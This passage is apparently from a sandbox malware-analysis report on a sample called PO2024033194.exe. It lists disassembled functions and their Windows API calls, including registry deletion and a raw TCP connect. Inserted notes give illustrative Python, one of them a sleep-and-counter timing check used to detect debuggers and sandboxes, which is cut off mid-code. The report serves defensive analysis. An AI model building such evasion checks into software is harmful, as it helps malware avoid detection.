                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                  • String ID:
                                                                  • API String ID: 2832842796-0
                                                                  • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                  • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                  • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                                  • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                  APIs
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Enum$CloseDeleteOpen
                                                                  • String ID:
                                                                  • API String ID: 2095303065-0
                                                                  • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                  • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                  • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                  • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: RectWindow
                                                                  • String ID:
                                                                  • API String ID: 861336768-0
                                                                  • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                  • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                  • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                  • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                  APIs
                                                                  • SendMessageW.USER32 ref: 00449598
                                                                    • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                  • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                  • _wcslen.LIBCMT ref: 0044960D
                                                                  • _wcslen.LIBCMT ref: 0044961A
                                                                  • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$_wcslen$_wcspbrk
                                                                  • String ID:
                                                                  • API String ID: 1856069659-0
                                                                  • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                  • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                  • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                  • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 004478E2
                                                                  • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                  • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                  • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                  • TrackPopupMenuEx.USER32(00906360,00000000,00000000,?,?,00000000), ref: 00447991
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CursorMenuPopupTrack$Proc
                                                                  • String ID:
                                                                  • API String ID: 1300944170-0
                                                                  • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                  • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                  • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                  • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 004479CC
                                                                  • GetCursorPos.USER32(?), ref: 004479D7
                                                                  • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                  • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                  • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1822080540-0
                                                                  • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                  • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                  • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                  • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                  • EndPaint.USER32(?,?), ref: 00447D13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                  • String ID:
                                                                  • API String ID: 659298297-0
                                                                  • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                  • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                  • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                  • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                  APIs
                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                    • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                    • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(00901B60,000000F1,00000000,00000000), ref: 00440E6E
                                                                    • Part of subcall function 00440D98: SendMessageW.USER32(00901B60,000000F1,00000001,00000000), ref: 00440E9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$EnableMessageSend$LongShow
                                                                  • String ID:
                                                                  • API String ID: 142311417-0
                                                                  • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                  • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                  • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                  • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                  • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                  • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                  • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 00445879
                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                  • _wcslen.LIBCMT ref: 004458FB
                                                                  • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                  • String ID:
                                                                  • API String ID: 3087257052-0
                                                                  • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                  • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                  • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                  • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                  APIs
                                                                    • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 245547762-0
                                                                  • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                  • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                  • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                  • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
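Editor's note on the record above: the inet_addr (in the subcall) -> socket(2,1,6) -> connect -> closesocket sequence, with WSAGetLastError read after the calls that can fail, is a plain TCP connect to an IPv4 address supplied as a dotted-quad string; socket(2,1,6) is socket(AF_INET, SOCK_STREAM, IPPROTO_TCP). The Python below is an added illustration of that call shape, not code recovered from PO2024033194.exe and not part of the Joe Sandbox report. The loopback listener, the unused-port helper and the hostname c2.example are constructed for the example; ipaddress.IPv4Address stands in for inet_addr and is stricter than it (inet_addr also accepts abbreviated forms).

```python
"""TCP connect to an IPv4 literal with explicit error reporting.

Added illustration only: not code from the analysed sample or from Joe Sandbox.
Maps the Winsock sequence in the report record onto the Python socket module:
  inet_addr()          -> ipaddress.IPv4Address (literal only, no DNS)
  socket(2, 1, 6)      -> socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
  WSAGetLastError()    -> the errno carried by the OSError
  closesocket()        -> sock.close() in a finally block
"""
import errno
import ipaddress
import socket
import threading
from typing import Dict, Tuple


def tcp_connect(ip_literal: str, port: int, timeout: float = 3.0) -> Dict[str, object]:
    """Connect to ip_literal:port over TCP and report the outcome.

    Raises ValueError if ip_literal is not an IPv4 literal (hostnames are
    rejected, as inet_addr would reject them). Returns a dict with 'ok',
    the numeric errno (None on timeout) and its symbolic name.
    """
    addr = str(ipaddress.IPv4Address(ip_literal))  # AddressValueError is a ValueError
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
    sock.settimeout(timeout)
    try:
        sock.connect((addr, port))
        return {"ok": True, "errno": None, "error": None}
    except OSError as exc:
        code = exc.errno  # None when the failure is a timeout
        name = errno.errorcode.get(code, "TIMEOUT" if code is None else str(code))
        return {"ok": False, "errno": code, "error": name}
    finally:
        sock.close()  # closesocket() on every path, success or failure


def start_loopback_listener() -> Tuple[int, threading.Thread]:
    """Constructed peer for offline use: accepts one connection on 127.0.0.1."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # ephemeral port chosen by the kernel
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve() -> None:
        try:
            conn, _ = srv.accept()
            conn.close()
        except OSError:
            pass
        finally:
            srv.close()

    thread = threading.Thread(target=serve, daemon=True)
    thread.start()
    return port, thread


def unused_loopback_port() -> int:
    """Pick a loopback port with no listener so a connect attempt is refused."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    port = probe.getsockname()[1]
    probe.close()
    return port


if __name__ == "__main__":
    port, thread = start_loopback_listener()
    print("listener  :", tcp_connect("127.0.0.1", port))
    thread.join(3)
    print("no listener:", tcp_connect("127.0.0.1", unused_loopback_port()))
```

Because the destination enters this path as a literal, no name resolution happens here; DNS telemetry will not show the peer for a connection made this way, while flow or firewall logs will.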
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                  • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                  • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                  • BeginPath.GDI32(?), ref: 0044723D
                                                                  • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$BeginCreateDeletePath
                                                                  • String ID:
                                                                  • API String ID: 2338827641-0
                                                                  • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                  • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                  • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                  • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 00434598
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                  • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CounterPerformanceQuerySleep
                                                                  • String ID:
                                                                  • API String ID: 2875609808-0
                                                                  • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                  • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                  • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                  • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
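Editor's note on the record above: Sleep followed by QueryPerformanceCounter, twice in a row, is the shape of a timing check: sleep, read a high-resolution counter, and compare the measured interval with the requested one. Such checks are used to detect debuggers (single-stepping makes the interval far too long) and sandboxes that skip or shorten sleeps (the interval comes out far too short). Whether this particular function performs that comparison is not shown by the listing; the Python below is an added illustration of the general technique, not code recovered from PO2024033194.exe and not part of the Joe Sandbox report. It uses time.sleep and time.perf_counter in place of Sleep and QueryPerformanceCounter; the thresholds, the two-sample minimum and the fake clock are assumptions chosen for the example.

```python
"""Sleep / high-resolution-counter timing check.

Added illustration only: not code from the analysed sample or from Joe Sandbox.
Mirrors the Sleep -> QueryPerformanceCounter pairing with time.sleep and
time.perf_counter. The sleep and clock functions are injectable so the check
can be exercised offline against a constructed sleep-skipping or stalled clock.
"""
import time
from typing import Callable, Dict, List


def make_fake_clock(step_seconds: float) -> Callable[[], float]:
    """Constructed clock for offline testing: advances by step_seconds per read."""
    state = {"now": 0.0}

    def clock() -> float:
        state["now"] += step_seconds
        return state["now"]

    return clock


def timing_check(requested_ms: float,
                 sleep: Callable[[float], None] = time.sleep,
                 clock: Callable[[], float] = time.perf_counter,
                 samples: int = 2,
                 fast_ratio: float = 0.5,
                 slow_ratio: float = 10.0) -> Dict[str, object]:
    """Sleep for requested_ms and measure the real interval with a fine counter.

    Each sample sleeps, then reads the counter. The minimum over `samples`
    readings is used: one scheduler hiccup cannot produce a false 'stalled'
    verdict, but a sleep that is skipped or shortened every time still shows
    up as 'accelerated'. Thresholds (fast_ratio, slow_ratio) are assumptions.
    """
    if requested_ms <= 0 or samples < 1:
        raise ValueError("requested_ms must be > 0 and samples >= 1")
    elapsed: List[float] = []
    for _ in range(samples):
        start = clock()
        sleep(requested_ms / 1000.0)
        elapsed.append((clock() - start) * 1000.0)
    best = min(elapsed)
    if best < requested_ms * fast_ratio:
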